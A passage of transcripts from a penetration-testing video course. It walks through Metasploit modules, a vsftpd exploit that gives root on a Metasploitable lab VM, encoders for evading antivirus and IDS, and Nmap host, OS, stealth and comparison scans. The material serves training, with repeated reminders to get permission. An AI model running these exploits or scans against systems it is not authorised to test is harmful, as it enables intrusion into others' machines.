representative of the internal IT security team. Their purpose is to prevent and stop attacks. And also to
educate IT staff on mitigation strategies and techniques used to prevent and reduce the impact of attacks. A
white box test is also called a transparent test. This means that there are a lot of details known to the testing
team. Things like implementation details for a network, a host, or an app. They have access to documentation
such as for a custom piece of software. It also can help illustrate what might happen if there is an insider type
of threat, whether intentional or unintentional.
Black box testing is quite different because the details of the internal configuration and implementation of a
solution are unknown to the testing team. So a black box test then is similar to what you might expect from an
external attack. Where the external attackers don't really have a lot of internal detailed information. So it
identifies weaknesses that are exploitable. A gray box test falls somewhere in between. What this means is that
some implementation details are known to the testing team. Now, source code is not known as it would be in a
white box test. However, there might be some knowledge of some security controls put in place. Such as a
specific type of firewall appliance and the version of the firmware running in it. And there might be some
configuration details known, such as network address ranges in use.
After completing this video, you will be able to recognize how Metasploit fits into penetration testing.
Objectives
[Video description begins] Topic title: Metasploit Overview. The presenter is Dan Lachance. [Video
description ends]
You get a version of it available automatically when you run Kali Linux. The Metasploit Framework is based
on Ruby. Ruby is just a programming language. It's a general purpose type of programming language. Now,
there are a number of components that comprise the Metasploit Framework, starting with auxiliaries. Now, an
auxiliary isn't used to actually exploit a vulnerability. It's more for things like reconnaissance, for scanning,
looking for vulnerabilities, or even for applying fuzz tests, that type of thing. Now an exploit is the actual code
that executes on a machine once a vulnerability is detected. So it's designed to take advantage of the weakness,
whatever that weakness happens to be. Then we've got the payload.
The payload is code that executes once the exploit compromises a system. It's often used to provide the
attacker with a reverse shell. Where the victim hacked machine contacts the attacking machine where the
attacker can enter commands. And finally, you have post-exploitation modules that are available. These are
used so you can run other tasks after you've compromised a system. Maybe to enumerate file systems or
enumerate other network hosts from that compromised system's perspective, or enumerate user accounts on
that system, that type of thing. Metasploit Framework auxiliary modules are located under
/usr/share/metasploit-framework/modules, and then /auxiliary. And some examples that you'll see in that
directory folders are admin, client, server, cloud, gather, spoof. Gather would be an example of running some
kind of a reconnaissance scan to learn more about something. Such as the version of a web server that's
running.
Then there's the concept of Metasploit Framework Encoders. The purpose of an encoder is to obfuscate
something when you're generating malicious payloads. Why would you want to do that? Well, you would
normally do this, if you've got some kind of characters that you don't want detected by an antivirus system. Or
maybe there's an exploit that only succeeds when you provide it a certain type of characters. So you can use an
encoder for those purposes. So the intent here is to bypass detection of some kind of malicious type of
character like a null value. So this would be used to bypass detection from intrusion detection systems or IDSs,
intrusion prevention systems, IPSs, and anti-virus type of solutions. Now you don't have to specify this unless
you want to, but by default, Metasploit will choose the best encoder to use. So it removes characters that could
easily be deemed suspicious or malicious. So removing things like null bytes or non-alphanumeric characters.
[Video description begins] Topic title: Explore Metasploit. The presenter is Dan Lachance. [Video description
ends]
The Metasploit Framework is included within Kali Linux. And it's a great penetration testing tool to not only
discover but attempt to exploit any discovered weaknesses. Of course, only with the express permission of
system owners. So to get started here in Kali Linux, I'm going to run msfconsole.
[Video description begins] The following window is open: dlachance@kali:~. The following prompt is
displayed: root@kali:~#. [Video description ends]
That's for Metasploit Framework Console. We'll just press Enter and give that a moment to load up.
[Video description begins] He executes the following command: msfconsole. The output displays that the
msfconsole has started. The output includes information about the metasploit version number, number of
exploits, and number of encoders. The prompt changes to msf5 >. [Video description ends]
And after a moment, we can see that we've started the MSF console as evidenced by our command prompt. It
says msf5 as opposed to being in a regular Linux shell. We can also see the version of Metasploit listed here at
the top, along with the number of exploits and payloads and encoders and so on. So I'm going to go ahead and
type clear to clear the screen. We're going to do an ls of the /usr/share/metasploit-framework. And then we're
going to go further within that and look at the module, so /modules.
So when I press Enter, notice here that we can see there are subdirectories for auxiliary, encoders, evasion,
exploits, nops, payloads, post, a lot of stuff here. So for example, if I were to go into the exploits location. So
let's bring up the previous command with the up arrow key. Let's change ls to cd, just for fun. So we can
change directory into one of these things. Now let's go into the exploits location. And I'll do an ls. Now we can
see we've got categories here such as for Android, and for Apple iOS, for BSD UNIX.
For Windows, well, let's go into windows, I'm going to change directory to windows. We'll do an ls in here.
And then we can see it's organized by the specific category, whether it's antivirus, backdoor, email, http, and so
on.
[Video description begins] He executes the following command: cd windows. No output returns and the
prompt does not change. He executes the following command: ls. The output displays a list of files and
directories in windows. The prompt does not change. [Video description ends]
So list goes on and on and on. So this is where the file system stuff really does show up. Now I can use the
back command to keep going back multiple levels once I've navigated into a specific exploit location.
[Video description begins] He executes the following command: back. No output returns and the prompt does
not change. [Video description ends]
So for example, let's say I were to type use exploit/windows/smb/psexec. So once I do that, notice that the
command prompt changes.
[Video description begins] He executes the following command: use exploit/windows/smb/psexec. No output
returns and the prompt changes to msf5 exploit(windows/smb/psexec) >. [Video description ends]
I'll clear the screen here so we can see that we're in that location for that exploit. And this is where if I were to
type back, it would take me back to where we were before we actually started that. However, I'm going to use
the up arrow key to bring that back up for a moment.
[Video description begins] He executes the following command: back. No output returns and the prompt
changes to msf5 >. [Video description ends]
Now you would use an exploit because you want to start configuring it. And then running that exploit to test a
vulnerability to actually see if it's exploitable.
[Video description begins] He executes the following command: use exploit/windows/smb/psexec. No output
returns and the prompt changes to msf5 exploit(windows/smb/psexec) >. [Video description ends]
Now, when you're in an exploit, you can type show options to see what can be set. These are a lot of variables.
[Video description begins] He executes the following command: show options. The output displays a list of
variables. The prompt does not change. [Video description ends]
Such as remote hosts, the remote port number, the service description, the share name, the SMB password,
SMB username, and so on. We can also, if I just clear the screen, type show payloads. Now these payloads will
be specific to working with windows/smb/psexec.
[Video description begins] He executes the following command: show payloads. The output displays a list of
payloads. The prompt does not change. [Video description ends]
So we can see there are a lot of payloads here that can be executed, such as injection types of attacks against
VNC, and so on. So there's a lot that's available in here. So I'm going to go ahead and use a payload, let's say,
use payload/windows/shell_bind_tcp. So you kind of have to know what these things are called. But you can
figure that out by typing in these commands to learn about which ones are available.
So I'm going to clear the screen to do that. So from here I could type show options again. And when I do that, I
can see the specific variables that we could set the value of. Using the set command by the way, we can also
see the current setting for the variables.
[Video description begins] He executes the following command: show options. The output displays a list of
variables, their current setting, whether the variable is required, and their description. The prompt does not
change. [Video description ends]
And whether or not the variable is required, whether it's mandatory. So I'm going to go ahead and type back,
just to back out of this.
[Video description begins] He executes the following command: back. No output returns and the prompt
changes to msf5 >. [Video description ends]
I'm also going to type in search. And let's say that we know that we've got a name of a specific category we're
looking for. In other words, I'm looking for exploits related to the Microsoft platforms. Microsoft and then
type: and then let's say exploit. So, I'm searching for name:Microsoft type:exploit.
[Video description begins] He executes the following command: search name:Microsoft type:exploit. The
output displays a list of exploits with the name Microsoft. The prompt does not change. [Video description
ends]
Now, we can see that we have quite a large list that has showed up here. So this is how you would know for
example, what to use. Here we've got exploit/windows/smb, and we've got ms05, so I could use the use
command.
We can say show options, we can start to see some of the variables here that we might want to set before we
actually run any of these attacks.
[Video description begins] He executes the following command: show options. The output displays a list of
variables. The prompt does not change. [Video description ends]
In this video, find out how to download and install a VM that can be exploited.
Objectives
[Video description begins] Topic title: Metasploitable. The presenter is Dan Lachance. [Video description
ends]
If you use your favorite web search engine and search up Metasploitable, it won't be difficult to locate this
download page. Metasploitable is a virtual machine that's purposely been configured to be vulnerable that you
can run pen tests against. Such as using Kali Linux and the Metasploit framework.
Now on this page down at the bottom, you first have to fill out a form before you can proceed with submitting.
And then, ultimately downloading a virtual machine disk from which you can build a virtual machine. Here,
I'm using VMware Workstation 15.5 PRO. So I'm going to go ahead and click Create a New Virtual Machine.
[Video description begins] He switches to the vmware WORKSTATION 15.5 PRO window. It includes a button
labeled "Create a New Virtual Machine". [Video description ends]
Since, I've already downloaded the specific virtual machine disk file for Metasploitable.
[Video description begins] A wizard called "New Virtual Machine Wizard" opens. A page called "Welcome to
the New Virtual Machine Wizard" is open. It includes a radio button labeled "Custom (advanced)" and a
button labeled "Next". The Custom (advanced) radio button is selected. [Video description ends]
So I'm going to use Custom. Next, I'm going to accept a lot of the defaults in the wizard here.
[Video description begins] A page called "Choose the Virtual Machine Hardware Compatibility" opens. It
includes a button labeled "Next". A page called "Guest Operating System Installation" opens. It includes a
radio button labeled "I will install the operating system later" and a button labeled "Next". The "I will install
the operating system later" radio button is selected. [Video description ends]
I'll choose, I will install the operating system later. Next, it's going to be Linux, Ubuntu 64-bit
[Video description begins] He clicks the "Next" button and a page called "Select a Guest Operating System"
opens. It includes a radio button labeled "Linux", a drop-down list box labeled "Version", and a button
labeled "Next". The "Linux" radio button is selected, and the following option is selected in the "Version"
drop-down list box: Ubuntu 64-bit. [Video description ends]
and I'm going to leave the Virtual machine name and Location the same as the default there.
[Video description begins] He clicks the "Next" button and a page called "Name the Virtual Machine" opens.
It includes a text box labeled "Virtual machine", populated with the following text: Ubuntu 64-bit. It also
includes a button labeled "Next" and a text box labeled "Location". [Video description ends]
[Video description begins] He clicks the "Next" button and a page called "Processor Configuration" opens. It
includes a button labeled "Next". [Video description ends]
[Video description begins] He clicks the "Next" button and a page called "Memory for the Virtual Machine"
opens. It includes a button labeled "Next". He clicks the "Next" button and a page called "Network Type"
opens. It includes a button labeled "Next" and four radio buttons labeled "Use bridged networking", "Use
network address translation (NAT)", "Use host-only networking", and "Do not use a network
connection". [Video description ends]
Will determine what kind of network connection you enable or your Metasploitable virtual machine. In my
case, I'm on a segmented, isolated network. So, I'm going to use bridged networking to actually make a
connection to the network with the Metasploitable virtual machine. Then I'll click Next. And I'll keep going
through this until I get to the Select a Disk part of the VMWare workstation wizard.
[Video description begins] He clicks the "Next" button and a page called "Select I/O Controller Types" opens.
It includes a button labeled "Next". He clicks the "Next" button and a page called "Select a Disk Type" opens.
It includes a button labeled "Next". He clicks the "Next" button and a page called "Select a Disk" opens. It
includes a button labeled "Next". It also includes three radio buttons labeled "Create a new virtual disk", "Use
an existing virtual disk", and "Use a physical disk". [Video description ends]
And I'm going to tell it to Use an existing virtual disk and of course as I proceed, that would be the one that
I've downloaded.
[Video description begins] He switches to a window called "Metasploitable 2". It includes a "Power on this
virtual machine" link. [Video description ends]
[Video description begins] A command prompt window opens. The screen prompts for the metasploitable
login. [Video description ends]
I'm going to click the Power on this virtual machine button and you're going to see that Linux is going to go
ahead and start up.
[Video description begins] The screen prompts for the password. [Video description ends]
After which, we can log in with the default username and password of msfadmin.
[Video description begins] The following prompt is displayed: msfadmin@metasploitable:~$. He executes the
following command: clear. No output returns and the prompt does not change. [Video description ends]
[Video description begins] He executes the following command: if config. The output displays the network
configuration. The prompt does not change. [Video description ends]
[Video description begins] He points to the following ip address in the output: 192.168.4.56. [Video
description ends]
And, if I do an ifconfig that will reveal the IP address that I can use in my pen testing tools like the Metasploit
Framework.
[Video description begins] He switches to the Metasploitable2 - Linux web page in the browser. [Video
description ends]
And, if I pop that IP address into the address bar of a web browser, this is the page you should see, which is
telling you that it's up and running.
In this video, find out how to use a variety of metasploit scanning and exploitation techniques.
Objectives
[Video description begins] Topic title: Metasploit Scanning and Exploits. The presenter is Dan
Lachance. [Video description ends]
Before using the Metasploit Framework to target hosts and test vulnerabilities to see how exploitable they are.
Of course, only on systems that you have express permission to do that against. You first might run a tool like
Nmap to discover which hosts are actually active on the network.
[Video description begins] The following window is open: dlachance@kali:~. The following prompt is
displayed: root@kali:~#. [Video description ends]
So I'm going to start with nmap, the network mapper tool, and I'm going to pass it a -sn. All this means is, I
don't want to do any port scanning. I just want to discover, which hosts are responsive on the network. So I
have to give it the network range. Here I'm going to put in 192.168.4.0/22. There are 22 bits in the subnet mask
the way my network segment is configured. So I'm going to go ahead and press Enter.
[Video description begins] He executes the following command: nmap -sn 192.168.4.0/22. The output displays
a list of network hosts. The prompt does not change. [Video description ends]
This shouldn't take long because it's not doing any kind of a deep, thorough probe of any devices that are up on
the network. It's only going to show us who's responding. And that would be a good starting point before
starting to test some of the Metasploit exploits. So here we can see the list is complete. So we can see that
hosts are listed as either being up, or it looks like all of these ones are up and running. So that's good. There's
plenty of them here.
[Video description begins] He executes the following command: clear. No output returns and the prompt does
not change. [Video description ends]
Now the next thing to consider is that we can also run nmap and do some fingerprinting. So, I'll pass -sV for
verbose. I want service details. So verbose service details -O, I want to do some OS fingerprinting. And I'm
going to give it the IP address in this case of a host that I want to test access against. So I'm going to go ahead
and press Enter to see what we can learn about this host. Now depending on how patched the host is.
[Video description begins] He executes the following command: nmap -sV -O 192.168.4.56. The output
displays that the IP address has been scanned. The prompt does not change. [Video description ends]
And depending on how hardened it is will determine what kind of information we get back from this nmap
command. Okay, looks like we've learned a lot. This is a Linux 2.6 kernel host. And it looks like if we kind of
scroll up here in the output, we get a sense of some of the open ports. It's running a lot of services. And we can
actually see the version of a lot of these services that are running on this host. So this is not a hardened host by
any stretch of the imagination.
[Video description begins] He executes the following command: clear. No output returns and the prompt does
not change. [Video description ends]
So the first thing I'm going to do here is use, I'll use the use command, auxiliary/scanner/http/http_version. So I
want to do a bit of HTTP reconnaissance against that specific host. Now if I type show options.
Here I can see that we've got a couple of required items like RHOSTS, that variable has to be set.
[Video description begins] He executes the following command: show options. The output displays a list of
variables, their current setting, whether the variable is required, and their description. The prompt does not
change. [Video description ends]
Currently, there's no setting. And under Required it says yes, of course, the Description tells us about that. The
remote port, well, probably 80 if it's just an HTTP web server, 443 if HTTPS. We've got a couple of other
items here, some of which are required. So what I'm going to do then is I'm going to use the set command to
set the value of some of these items, these variables, set RHOSTS. And I'm going to set the target here to be
192.168.4.56. I know that is a vulnerable virtual machine under my control, so I don't need to get permission to
run these commands against it.
[Video description begins] He executes the following command: set RHOSTS 192.168.4.56. The output reads:
RHOSTS => 192.168.4.56. The prompt does not change. [Video description ends]
And after I've done that, I can also determine, if I want to set any other items, any other variables. Well,
RPORT is already set to a value of 80.
[Video description begins] He executes the following command: clear. No output returns and the prompt does
not change. [Video description ends]
Let's just clear the screen here, show options. You can also see that our RHOSTS is now configured, we've got
a setting.
[Video description begins] He executes the following command: show options. The output displays a list of
variables, their current setting, whether the variable is required, and their description. The prompt does not
change. [Video description ends]
So at this point, we're ready to simply run this. I'm going to go ahead and type run.
[Video description begins] He executes the following command: clear. No output returns and the prompt does
not change. [Video description ends]
So what it's going to do is scan that host on port 80, and we already know now it's identified what it's running.
[Video description begins] He executes the following command: run. The output displays that the scan of the
host is complete and the auxiliary module execution is complete. The prompt does not change. [Video
description ends]
It's running the Apache Web Server 2.2.8 on Ubuntu Linux and we can even see it's got PHP there, okay. So
part of reconnaissance is determining what is running out there. Let's say, I were to change this to something
else that might be a little more hardened or resilient to returning this kind of information. So I'm going to set
RHOSTS. In this case to a different IP address, and I'm going to type run.
[Video description begins] He executes the following command: set RHOSTS 192.168.4.1. The output reads:
RHOSTS => 192.168.4.1. The prompt does not change. He then executes the following command: run. The
output displays that the scan of the host is complete and the auxiliary module execution is complete. The
prompt does not change. [Video description ends]
Notice this time we didn't get anything, we don't know if it's running Apache or IIS or Nginx. We don't know
what kind of web server is there. From fact, there is none, we have nothing returned. So having done that,
that's fine. Let's do something else. Let's see, if we can brute force and scan through an app looking for open
subdirectories.
[Video description begins] He executes the following command: clear. No output returns and the prompt does
not change. [Video description ends]
That essentially will let us view information that otherwise might be designed to be private. So I'm going to
use auxiliary once again, /scanner/http/brute as in brute_dirs. Okay, so it looks like that has taken.
So again, if I type show options, we can see some of the variables here and whether or not they are required.
[Video description begins] He executes the following command: show options. The output displays a list of
variables, their current setting, whether the variable is required, and their description. The prompt does not
change. [Video description ends]
Notice that RHOSTS the variable didn't carry over. We didn't work with it as a global variable, and it is
required. So that's my target. So I'm going to set RHOSTS and I'm going to use the same target in this case.
And at this point, I'm going to go ahead and type run.
[Video description begins] He executes the following command: clear. No output returns and the prompt does
not change. He executes the following command: set RHOSTS 192.168.4.56. The output reads: RHOSTS =>
192.168.4.56. The prompt does not change. [Video description ends]
So it looks like it's trying to essentially enumerate through everything on that web site.
[Video description begins] He executes the following command: run. The output displays that the scan of the
host is complete and the auxiliary module execution is complete. The prompt does not change. [Video
description ends]
It is a web app. And we're getting some 404 not found and it's looking for couple of other items as well. Okay,
so looks like we didn't get too much really returned. It did say it found two subdirectories, /dav and /doc, that
potentially might be open. Let's set RHOSTS to another web application that is under our control. You never
want to run these against sites you don't have access to. Because you might render the site unusable and that
could be considered illegal. So we'll specify a different host this time at a different IP address. And let's go
ahead and run this again.
[Video description begins] He executes the following command: set RHOSTS 192.168.4.54. The output reads:
RHOSTS => 192.168.4.54. The prompt does not change. He executes the following command: clear. No
output returns and the prompt does not change. [Video description ends]
So I'm just going to type run, now that we've set that to be something different.
[Video description begins] He executes the following command: run. The output displays that the scan of the
host is complete and the auxiliary module execution is complete. The prompt does not change. [Video
description ends]
And this time we don't really get anything that's returned like we did with the previous example. So here in a
web browser, if I actually try to connect to something that was shown in our previous example as being found.
We can see indeed it looks like there's a directory here on this web app. That probably shows a little bit too
much information.
[Video description begins] He switches to a browser and the following URL is open: 192.168.4.56/doc/. The
page displays a list of folders. [Video description ends]
So as we scroll through, we can see a lot of stuff in the Linux file system that we probably shouldn't be able to
see. Next, let's take a look at what we might be able to exploit in terms of FTP server daemon vulnerabilities.
[Video description begins] He switches back to the command prompt window. [Video description ends]
So I'm going to go ahead and use an exploit. And I'm going go into exploits/unix/ftp/vsftpd_. And again, if
you've put in enough unique characters, you can press tab and it'll complete the name for you.
So let's go ahead and use that exploit, as usual, going to run show options. What do we have here?
[Video description begins] He executes the following command: show options. The output displays a list of
variables, their current setting, whether the variable is required, and their description. The prompt does not
change. [Video description ends]
RHOSTS, nothing in the Current Setting, no value for that variable, and it's required, okay. Not a problem.
Let's clear the screen and let's set RHOSTS 192.168.4 and in this case, I'm going to make it a host listening at a
specific IP, in this case, .56. All right, that looks good.
[Video description begins] He executes the following command: set RHOSTS 192.168.4.56. The output reads:
RHOSTS => 192.168.4.56. The prompt does not change. [Video description ends]
I'm going to set the remote port, RPORT to the standard FTP port of 21. That's fine.
[Video description begins] He executes the following command: set RPORT 21. The output reads: RPORT =>
21. The prompt does not change. [Video description ends]
Okay, so it's looking like it's trying to make a connection. And it looks like it's actually opening a Command
shell session. So it looks like we're in, how we know that? Well, we could type in commands like ifconfig to
see what it returns. It's actually returning the IP address of that remote host. We have privileges on that remote
host at the command-line level, simply by talking to it through port 21 through FTP.
[Video description begins] He executes the following command: ifconfig. The output displays the system
details including the ip address. [Video description ends]
So, if I were to type commands like whoami, we can see we're logged in as user root there. If we were to type
ls /, we can see the root of the file system as well.
[Video description begins] He executes the following command: whoami. The output reads: root. [Video
description ends]
[Video description begins] He executes the following command: ls /. The output displays a list of files. [Video
description ends]
If we were to type in the hostname command, we can see this is actually a host called metasploitable.
[Video description begins] He executes the following command: hostname. The output reads:
metasploitable. [Video description ends]
So we are in. So this is only but a tiny, tiny example. A tiny sampling of what is potentially available to run
exploits using the Metasploit Framework. Just make sure that you only run it against hosts that you have
express permission to run it against.
During this video, you will learn how to run a Nmap network scan.
Objectives
[Video description begins] Topic title: Nmap Network Scan. The presenter is Dan Lachance. [Video
description ends]
Nmap stands for network mapper. It is a network scanning type of tool. Not technically really a vulnerability
scanner, other than being able to identify ports that respond. But it doesn't actually check for databases, and
applications, and web app vulnerabilities. So to get started here in Kali Linux at the command-line, I'm going
to start by simply running nmap -sn.
[Video description begins] The following window is open: dlachance@kali:~. The following prompt is
displayed: root@kali:~#. [Video description ends]
This means all I want to do is get a list of network hosts that are up and running. I do not want to do a port scan
or anything like that. So 192.168.4.0/22 bits in the subnet mask. This is my network address range. I'm simply
performing reconnaissance here, so I can see which hosts respond on the network. So this is a passive type of
reconnaissance tool. Now it's not that it can't be detected, but we aren't actively trying to do anything to the
machines or to exploit any vulnerabilities.
[Video description begins] He executes the following command: nmap -sn 192.168.4.0/22. The output displays
a list of network hosts. The prompt does not change. [Video description ends]
So at this point, we have a list of all the hosts that are up and running. We can see the IP addresses for them,
along with the MAC addresses. And because the first three parts of the 48-bit MAC address identify the
vendor, sometimes you'll see it'll show you the actual vendor name, like Google, or Hewlett Packard, or
VMware, and so on.
[Video description begins] He points to the host addresses in the output. He executes the following command:
clear. No output returns and the prompt does not change. [Video description ends]
Bear in mind, that when you're running these commands, so I'll use the up arrow key to bring up that first
command. You can always use the > symbol, so the output redirection symbol, and store the output in a file.
So maybe I'd put this on the root of the filesystem on this host and call it active_hosts.
[Video description begins] He executes the following command: nmap -sn 192.168.4.0/22 > /active_hosts. No
output returns and the prompt does not change. [Video description ends]
So then I have it stored in a file, I can refer to it at any point in time. So for example, using the cat command, I
can refer to /active_hosts.
[Video description begins] He executes the following command: cat /active_hosts. The output displays a list of
the files contents. The prompt does not change. [Video description ends]
And there's the contents of that. So that's something else to bear in mind.
[Video description begins] He executes the following command: clear. No output returns and the prompt does
not change. [Video description ends]
Now we can also do operating system, or OS fingerprinting, against a specific host. And depending on what
kind of firewall is installed on that host, and how its configured, and how hardened the host is, will determine
what we get returned back. So let's go ahead and run nmap -sV. So I want to scan services running on the host.
But at the same time -O, I want to do OS fingerprinting. And at this point, now that I know which hosts are
active on the network, I might start choosing a specific host against which I want to run this command. So I'm
going to go ahead and pop that in there.
[Video description begins] He executes the following command: nmap -sV -O 192.168.4.56. The output
displays a list of open ports and the OS details. The output includes a table with four columns and several
rows. The column headers are PORT, STATE, SERVICE, and VERSION. The prompt does not change. [Video
description ends]
Now before too long, it doesn't take too much to figure out that this is a machine running a Linux 2.6 kernel.
And if we scroll up we can also see, not only that we have a number of open ports for services like ftp, ssh,
telnet, smtp. There's an awful lot of stuff running here it makes me wonder should it be? Or is a lot of that
simply running but isn't being used? Hard to say. But what we can also see here is the VERSION of each of
the services. I can see vsftpd 2.3.4 for the version of the FTP Daemon. I can see OpenSSH and the version
that's used for that. I can see Apache httpd 2.2.8. I can see this is running on Ubuntu. So we're learning way too
much information. This should not be readily available, even if this host is on a private network.
[Video description begins] He points to the versions of several ports in the output. [Video description ends]
So I'm going to go ahead and clear the screen. We'll take a look at a couple of other variations as well. So I'm
going to run nmap yet again. And let's say that I'm going to pass that a, s but just a T, because I'm only
interested in listing TCP ports. We'll put in the same host once again.
[Video description begins] He executes the following command: nmap -sT 192.168.4.56. The output displays a
list of open tcp ports. The prompt does not change. [Video description ends]
So now, all we're seeing is a list of open TCP ports on that host. And of course the MAC address of the
machine that we ran this against. Now remember, this is just network scanning, this is part of reconnaissance.
So we can determine what is listening on the network, so which hosts are active. And then for each of those
host, which network services they have in a listening state. We can also do the same type of thing for UDP. So,
if I were to bring up the previous command here,
[Video description begins] He executes the following command: clear. No output returns and the prompt does
not change. [Video description ends]
I can simply change the capital, TCP to UDP. And I can even specify a port, let's say -p for port number and
port 53. UDP port 53 is used by DNS servers.
[Video description begins] He executes the following command: nmap -sU -p 53 192.168.4.56. The output
displays a table of open udp ports. The table has three columns and one row. The column headers are PORT,
STATE, and SERVICE. The prompt does not change. He points to the row entry, PORT: 53/udp, STATE: open,
and SERVICE: domain. [Video description ends]
So we can see here that indeed, yes, it is in an open state. So we know that this is a Domain Name Server, or
DNS server, used for name resolutions. So we're learning more, and more, and more. Now another interesting
aspect of nmap is you can run it essentially in stealth mode.
[Video description begins] He executes the following command: clear. No output returns and the prompt does
not change. [Video description ends]
So if I run -s, then a S for stealth mode, I can then give it the IP address of the target. Now what does this
mean? Normally, if you're using nmap, let's say to make a TCP connection to a target, there's a three-way
handshake that has to occur. And in many cases, many systems won't write anything to a log until the three-
way handshake has completed before transmission occurs. So with the self type of scan, what we're doing, is
we aren't establishing a connection. We're not giving it the final acknowledgement that says yes. Instead, we
are sending a reset connection packet or RST. And so as a result this allows us to scan a host and, depending
on the host itself of course, and how it's configured, and how patched it is, will determine if this type of scan
even shows up in its log. So we can see we did get the return result.
[Video description begins] He executes the following command: nmap -sS 192.168.4.56. The output displays a
list of open ports. [Video description ends]
Because our original command, if we go back up, was to simply connect to that host. And it's showing us all of
the ports that are open on that host. But it did it in stealth mode. And that was specified with this S in the
command-line.
[Video description begins] He switches to a browser. The following URL is open: nmap.org/zenmap/. The
page includes an "Nmap download page" link. [Video description ends]
And then, there's the Zenmap GUI front end, which uses Nmap in the background. So we can see here from the
nmap.org download page that we can download Nmap along with the Zenmap GUI all in one package.
[Video description begins] He clicks the "Nmap download page" link and its corresponding page opens in the
browser. [Video description ends]
I've already downloaded and installed this for the Windows platform on my Windows 10 station.
[Video description begins] He opens the Zenmap window. It is divided into four parts. The first part is a menu
bar. The second part includes a drop-down list box labeled "Target", a field labeled "Command", another
drop-down list box labeled "Profile". It also includes a button labeled "Scan" adjacent to the "Profile" drop-
down list box. The third part contains two tabs: Hosts and Services. The "Hosts" tab is selected and the
"Hosts" pane is open. The fourth part is the content pane. It includes the following tabs: Nmap Output, Ports /
Hosts, and Scans. The "Nmap Output" tab is selected. [Video description ends]
So here in Zenmap, the first thing we have to do is define the Target. Which hosts on the network do I want to
scan? Or it might be the entire network to discover which hosts are up and running. So in my case, I'm going to
put in 192.168.4.0/22.
[Video description begins] He selects the following option in the "Target" drop-down list box: 192.168.4.0/22.
The following text gets populated in the "Command" field: nmap -T4 -A -v 192.168.4.0/22. [Video description
ends]
22-bit subnet mask. And notice, it's generating the actual background nmap command shown down below here
in the Command bar. Now we can see that as we select a different scanning profile, for example, if I were to
choose Ping scan, it's changing the command based on my Profile selection. So, I'm going to go ahead here and
just do a Quick scan.
[Video description begins] He selects the following option in the "Profile" drop-down list box: Quick Scan.
The following text gets populated in the "Command" field: nmap -T4 -F 192.168.4.0/22. [Video description
ends]
This is one of those things that you want to do periodically. And ideally, you will run an intense or a slow
comprehensive scan to learn as much as you possibly can about the hosts that are detected out on the network.
In this case, I'll just do a quick scan. And I'll click the Scan button. So we can see now under Nmap Output that
the scan has begun. And, if we go to the Scans tab, we'll see it's listed here at any point in time. We can cancel
it and remove it from the list.
[Video description begins] The "Scans" tab in the content pane include two buttons labeled "Remove Scan"
and "Cancel Scan". [Video description ends]
But I'm just going to go back to the Nmap Output. And before too long, we can see that the scan is completed.
Now we're going to know that because down under the Nmap Output tab, if you go to the very bottom, it says
Nmap done. And so, it's telling us that there are 17 hosts up on this TCP/IP subnet. We can see the host IP
addresses listed over in the left-hand column.
[Video description begins] He points to the "Hosts" pane. [Video description ends]
If we scroll all the way back up, of course, we can see each host listed that was scanned. And then we can see
some details for it. So for example, here's our first one, 192.168.4.1, the host is up. And we can see that it's got
a couple of ports open. So domain, or DNS, on 53. And then universal plug and play, or upnp, on port 1900.
Universal plug and play is known to have some security vulnerabilities, especially with IoT devices or even
wireless routers. So this would be an indicator that maybe that's something that should be addressed to harden
that device. In the left-hand column, you can also view this by service.
[Video description begins] He points to the output in the "Nmap Output" tab. [Video description ends]
[Video description begins] He selects the "Services" tab and the "Services" pane opens. It includes "jetdirect",
"http", "ftp", and "mysql" options. [Video description ends]
And on the right, I then get a filtered list of hosts that are JetDirect devices. In other words, network printing
devices, in this case listening on tcp port 9100.
[Video description begins] He clicks the "jetdirect" option and its corresponding details appear in the "Ports /
Hosts" tab in the content pane. [Video description ends]
I can see any mysql hosts that are out of the network, http hosts, ftp hosts, and so on.
[Video description begins] He clicks the "mysql" option and its corresponding details appear in the "Ports /
Hosts" tab in the content pane. [Video description ends]
So this is the purpose of Nmap whether you use it with or without the Zenmap front end GUI, is to scan the
network to discover what's there. And also to be able to see which ports are running or open on those items. Of
course, you can also go to your Scan menu and you can save the scan. And you might even run periodic scans
and then compare them together to see what's changed.
[Video description begins] Topic title: Network Scan Comparisons. The presenter is Dan Lachance. [Video
description ends]
One of the reasons it's important to conduct periodic network scans is so that you can identify what's changed.
Whether devices have been removed from the network. And also whether devices have been added to the
network. Sometimes an added device to the network, especially if it wasn't deployed by the IT department.
And it's not an operating system that we would normally use such as Linux. Then, that might be an indicator of
some kind of a compromise. So to get started here in Zenmap, the front end GUI to the Nmap tool.
[Video description begins] The Zenmap window is open. The menu bar includes a Tools menu. [Video
description ends]
I'm going to compare two scans that I've already taken previously on my network. So I'm going to go to the
Tools menu. And I'm going to choose Compare Results.
[Video description begins] A dialog box labeled "Compare Results" opens. It includes two text boxes labeled
"A Scan" and "B Scan". Adjacent to both text boxes there are two buttons labeled "Open". [Video description
ends]
I'm going to click Open for the A Scan. And I'm going to open up a file, I've got called Scan1.xml. That's the
result of running an Nmap scan here. And then saving it as an XML file previously. For the B Scan, I'm going
to go ahead and choose Scan2.xml. And what it does, if we just maximize this, is, it starts to compare the
differences between the two scans. And the order that you select these scans, in other words the A Scan versus
the B Scan, is important in terms of how you interpret the results.
So when I have a negative or a minus sign in front of an entry, it's clearly shown here in red, it means that that
item has changed. It was removed or not present. Whereas the + means it is now present or was added.
Anything that essentially just has a space in front of it instead of a - for remove or a + for add, means it's
unchanged. So as we scroll down through the listing, we'll see a lot of comparisons here. So we're looking,
obviously, for the red and the green. So I can see that on the first scan, Scan1, this host with a specific IP
address and MAC address looks like it was removed. Because initially in the A scan, so scan number 1, this
host was up and running. In Scan2, that host was down.
[Video description begins] He points to the following text: 192.168.0.11, 5C:51:88:88:F1:59:. [Video
description ends]
So we're now seeing that we have a change between those two scans, in terms of hosts that were up and
running versus ones that are not. And we can do the same thing as we continue on with our comparison.
[Video description begins] He points to the following text: 192.168.0.13:. [Video description ends]
So again, we can see we have another host IP address shown here that was down initially in Scan1. But, of
course, then became online. It was added. Same IP address, the address was scanned in Scan1, it just, there was
no response.
[Video description begins] He points to the following text: 192.168.0.13, E8:9E:B4:19:4A:BB:. [Video
description ends]
Now, there is at least at the time that Scan2 was taken. The +Host is up. And we can see any ports that are
available for that. In some cases it'll be able to identify what it is. In this case, a Sony Android TV.
So as we keep going down through here, we can see a lot of these different entries that show up. And based on
what we can see, we can determine that there are devices that either should or should not be on the network.
For example, here we see HP Officejet. So it looks like we've got an HP Officejet device with ports open on
the network. 445 and 3995 and so on. So as we go through this, we can start to learn more about what's
changed on the network. For example, we've got a host that is now up as of scan number two. We can see the
